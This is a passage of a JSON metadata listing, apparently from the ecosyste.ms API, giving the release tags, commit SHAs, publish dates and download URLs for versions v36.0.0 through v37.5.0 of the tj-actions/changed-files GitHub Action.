at":"2023-11-09T04:04:45.633Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.5.0/manifests"},{"name":"v37.4.0","sha":"de0eba32790fb9bf87471b32855a30fc8f9d5fc6","kind":"commit","published_at":"2023-07-20T18:05:55.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.4.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.4.0","dependencies_parsed_at":"2023-11-09T04:04:45.568Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.4.0/manifests"},{"name":"v37.3.0","sha":"39283171cefdf491e0f0d6cf285b86b31eb6f3cd","kind":"commit","published_at":"2023-07-19T07:53:16.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.3.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.3.0","dependencies_parsed_at":"2023-11-09T04:04:45.747Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.3.0/manifests"},{"name":"v37.2.0","sha":"68b429ddc666ea0dba46309e1ee45e06bb408df8","kind":"commit","published_at":"2023-07-18T17:41:01.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.2.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.2.0","dependencies_parsed_at":"2023-11-09T04:04:46.158Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.2.0/manifests"},{"name":"v37.1.2","sha":"2a968ff601949c81b47d9c1fdb789b0d25ddeea2","kind":"commit","published_at":"2023-07-13T19:01:23.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.1.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.1.2","dependencies_parsed_at":"2023-11-09T04:04:45.763Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.1.2/manifests"},{"name":"v37.1.1","sha":"1f20fb83f05eabed6e12ba0329edac8b6ec8e207","kind":"commit","published_at":"2023-07-11T02:05:24.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.1.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.1.1","dependencies_parsed_at":"2023-11-09T04:04:45.635Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.1.1/manifests"},{"name":"v37.1.0","sha":"87e23c4c79a603288642711155953c7da34b11ac","kind":"commit","published_at":"2023-07-09T09:35:22.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.1.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.1.0","dependencies_parsed_at":"2023-11-09T04:04:45.636Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.1.0/manifests"},{"name":"v37.0.5","sha":"54849deb963ca9f24185fb5de2965e002d066e6b","kind":"commit","published_at":"2023-06-29T16:14:26.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.0.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.0.5","dependencies_parsed_at":"2023-11-09T04:05:05.003Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.0.5/manifests"},{"name":"v37.0.4","sha":"bb3376162b179308a79fc4450262a15a8e1d6888","kind":"commit","published_at":"2023-06-27T06:05:28.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.0.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.0.4","dependencies_parsed_at":"2023-11-09T04:05:05.044Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.0.4/manifests"},{"name":"v37.0.3","sha":"ec1e14cf27f4585783f463070881b2c499349a8a","kind":"commit","published_at":"2023-06-26T02:11:53.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.0.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.0.3","dependencies_parsed_at":"2023-11-09T04:04:45.629Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.0.3/manifests"},{"name":"v37.0.2","sha":"2106eb4457dd2aba4d37c8cdd16acba5d18739b9","kind":"commit","published_at":"2023-06-25T17:12:13.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.0.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.0.2","dependencies_parsed_at":"2023-11-09T04:04:45.754Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.0.2/manifests"},{"name":"v37","sha":"2106eb4457dd2aba4d37c8cdd16acba5d18739b9","kind":"commit","published_at":"2023-06-25T17:12:13.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37/manifests"},{"name":"v37.0.1","sha":"e5efec47f620e0fde64a1ad8f53bbf53d51a8c97","kind":"commit","published_at":"2023-06-24T15:27:16.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.0.1","dependencies_parsed_at":"2023-11-09T04:04:45.618Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.0.1/manifests"},{"name":"v37.0.0","sha":"5817a9efb0d7cc34b917d8146ea10b9f32044968","kind":"commit","published_at":"2023-06-23T19:13:27.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v37.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v37.0.0","dependencies_parsed_at":"2023-11-09T04:05:05.013Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v37.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v37.0.0/manifests"},{"name":"v36.4.2","sha":"a4cd522ee2e5d7999bb102867e6d806e59861c52","kind":"commit","published_at":"2023-06-23T18:55:55.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.4.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.4.2","dependencies_parsed_at":"2025-03-16T04:24:03.729Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.4.2/manifests"},{"name":"v36","sha":"54479c37f5eb47a43e595c6b71e1df2c112ce7f1","kind":"commit","published_at":"2023-06-19T21:34:12.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36","dependencies_parsed_at":"2023-11-09T04:04:45.604Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36/manifests"},{"name":"v36.4.1","sha":"54479c37f5eb47a43e595c6b71e1df2c112ce7f1","kind":"commit","published_at":"2023-06-19T21:34:12.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.4.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.4.1","dependencies_parsed_at":"2023-11-09T04:04:45.765Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.4.1/manifests"},{"name":"v36.4.0","sha":"e1754a427f478b8778d349341b8f1d80f1f47f44","kind":"commit","published_at":"2023-06-17T03:30:45.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.4.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.4.0","dependencies_parsed_at":"2023-11-09T04:04:46.162Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.4.0/manifests"},{"name":"v36.3.0","sha":"9bf09145c3560e451e8d8e87b42ccb3fef5b692d","kind":"commit","published_at":"2023-06-16T06:35:24.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.3.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.3.0","dependencies_parsed_at":"2023-11-09T04:04:45.567Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.3.0/manifests"},{"name":"v36.2.1","sha":"c9124514c375de5dbb9697afa6f2e36a236ee58c","kind":"commit","published_at":"2023-06-14T20:01:14.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.2.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.2.1","dependencies_parsed_at":"2023-11-09T04:04:45.540Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.2.1/manifests"},{"name":"v36.2.0","sha":"174a2a6360b54a2019877c254c4be78106efc94f","kind":"commit","published_at":"2023-06-14T18:45:32.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.2.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.2.0","dependencies_parsed_at":"2023-11-09T04:04:46.159Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.2.0/manifests"},{"name":"v36.1.0","sha":"fb20f4d24890fadc539505b1746d260504b213d0","kind":"commit","published_at":"2023-06-08T12:56:26.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.1.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.1.0","dependencies_parsed_at":"2023-11-09T04:04:45.625Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.1.0/manifests"},{"name":"v36.0.18","sha":"07e0177b72d3640efced741cae32f9861eee1367","kind":"commit","published_at":"2023-06-06T13:45:21.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.18","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.18","dependencies_parsed_at":"2023-11-09T04:04:45.629Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.18/manifests"},{"name":"v36.0.17","sha":"b13786805affca18e536ed489687d3d8d1f05d21","kind":"commit","published_at":"2023-06-05T03:51:28.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.17","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.17","dependencies_parsed_at":"2023-11-09T04:04:46.163Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.17/manifests"},{"name":"v35.9.3-sec","sha":"8663bb8fc810b983a35585a2dd6a121c09d2590d","kind":"commit","published_at":"2023-06-04T16:32:19.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.9.3-sec","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.9.3-sec","dependencies_parsed_at":"2023-11-09T04:04:50.112Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.9.3-sec","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.3-sec","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.3-sec/manifests"},{"name":"v35","sha":"039afcd1024c210363c9d3fc8fd07e1f3fcf2867","kind":"commit","published_at":"2023-06-04T16:22:21.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35","dependencies_parsed_at":"2023-11-09T04:04:31.706Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35/manifests"},{"name":"v35.9.3","sha":"039afcd1024c210363c9d3fc8fd07e1f3fcf2867","kind":"commit","published_at":"2023-06-04T16:22:21.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v35.9.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v35.9.3","dependencies_parsed_at":"2023-11-09T04:04:47.797Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v35.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v35.9.3/manifests"},{"name":"v36.0.16","sha":"1aae16084af435f73c8cdfd742473028810c5f20","kind":"commit","published_at":"2023-06-03T01:21:45.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.16","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.16","dependencies_parsed_at":"2023-11-09T04:05:05.011Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.16/manifests"},{"name":"v36.0.15","sha":"5d2fcdb4cbef720a52f49fd05d8c7edd18a64758","kind":"commit","published_at":"2023-06-02T04:39:26.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.15","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.15","dependencies_parsed_at":"2023-11-09T04:04:45.759Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.15/manifests"},{"name":"v36.0.14","sha":"9ecc6e7fe2e26945b52485ccd9bc4b44000f5af1","kind":"commit","published_at":"2023-06-01T17:18:54.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.14","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.14","dependencies_parsed_at":"2023-11-09T04:05:05.032Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.14/manifests"},{"name":"v36.0.13","sha":"8c9ee56d0180a538ad5b6b8a208e4db974bad9c0","kind":"commit","published_at":"2023-06-01T16:34:16.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.13","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.13","dependencies_parsed_at":"2023-11-09T04:04:45.600Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.13/manifests"},{"name":"v36.0.12","sha":"5978e5a2df95ef20cde627d4acb5edd1f87ba46a","kind":"commit","published_at":"2023-06-01T16:03:09.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.12","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.12","dependencies_parsed_at":"2023-11-09T04:04:46.136Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.12/manifests"},{"name":"v36.0.11","sha":"17c3e9e98f47ef859502ba3e38be0b8a6a4bddd9","kind":"commit","published_at":"2023-05-31T21:26:08.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.11","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.11","dependencies_parsed_at":"2023-11-09T04:04:46.112Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.11/manifests"},{"name":"v36.0.10","sha":"3f7b5c900bdbf1b80a825e220413986227b3ff03","kind":"commit","published_at":"2023-05-30T21:27:56.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.10","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.10","dependencies_parsed_at":"2023-11-09T04:04:45.751Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.10/manifests"},{"name":"v36.0.9","sha":"cf4fe8759a45edd76ed6215da3529d2dbd2a3c68","kind":"commit","published_at":"2023-05-29T16:12:36.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.9","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.9","dependencies_parsed_at":"2023-11-09T04:04:45.553Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.9/manifests"},{"name":"v36.0.8","sha":"043929ee8fffa1dd1d619782a5a338cf39e76e23","kind":"commit","published_at":"2023-05-29T01:56:55.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.8","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.8","dependencies_parsed_at":"2023-11-09T04:05:05.001Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.8/manifests"},{"name":"v36.0.7","sha":"4e2535f2b330e70ff7055f7de4272653cfdbd555","kind":"commit","published_at":"2023-05-29T01:24:22.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.7","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.7","dependencies_parsed_at":"2023-11-09T04:04:45.535Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.7/manifests"},{"name":"v36.0.6","sha":"652648acb4f32660a94e245a2a51c6d0e56b2a1d","kind":"commit","published_at":"2023-05-26T17:18:05.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.6","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.6","dependencies_parsed_at":"2023-11-09T04:04:45.574Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.6/manifests"},{"name":"v36.0.5","sha":"9ad1a5b96ab3e56cd2bb25ff90c6271e4e70eb71","kind":"commit","published_at":"2023-05-26T16:48:32.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.5","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.5","dependencies_parsed_at":"2023-11-09T04:04:45.518Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.5/manifests"},{"name":"v36.0.4","sha":"c798a4ea57f0e0a9d2b5374853c9c479ebb435a2","kind":"commit","published_at":"2023-05-26T14:20:56.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.4","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.4","dependencies_parsed_at":"2023-11-09T04:04:45.641Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.4/manifests"},{"name":"v36.0.3","sha":"25eaddf37ae893cec889065e9a60439c8af6f089","kind":"commit","published_at":"2023-05-26T03:14:24.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.3","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.3","dependencies_parsed_at":"2023-11-09T04:05:04.998Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.3/manifests"},{"name":"v36.0.2","sha":"abef388dd913ce13a650bbf800eba73961657fb9","kind":"commit","published_at":"2023-05-25T23:39:26.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.2","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.2","dependencies_parsed_at":"2023-11-09T04:05:05.023Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.2/manifests"},{"name":"v36.0.1","sha":"1c2673b763ea086acd660dd4257c9be06eb77667","kind":"commit","published_at":"2023-05-25T21:26:13.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.1","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.1","dependencies_parsed_at":"2023-11-09T04:04:45.631Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.1/manifests"},{"name":"v36.0.0","sha":"53c377a374b445ec2a61e343068807bf41f2c9a6","kind":"commit","published_at":"2023-05-25T20:45:30.000Z","download_url":"https://codeload.github.com/tj-actions/changed-files/tar.gz/v36.0.0","html_url":"https://github.com/tj-actions/changed-files/releases/tag/v36.0.0","dependencies_parsed_at":"2023-11-09T04:05:05.031Z","dependency_job_id":null,"purl":"pkg:github/tj-actions/changed-files@v36.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fchanged-files/tags/v36.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tj-actions%2Fcha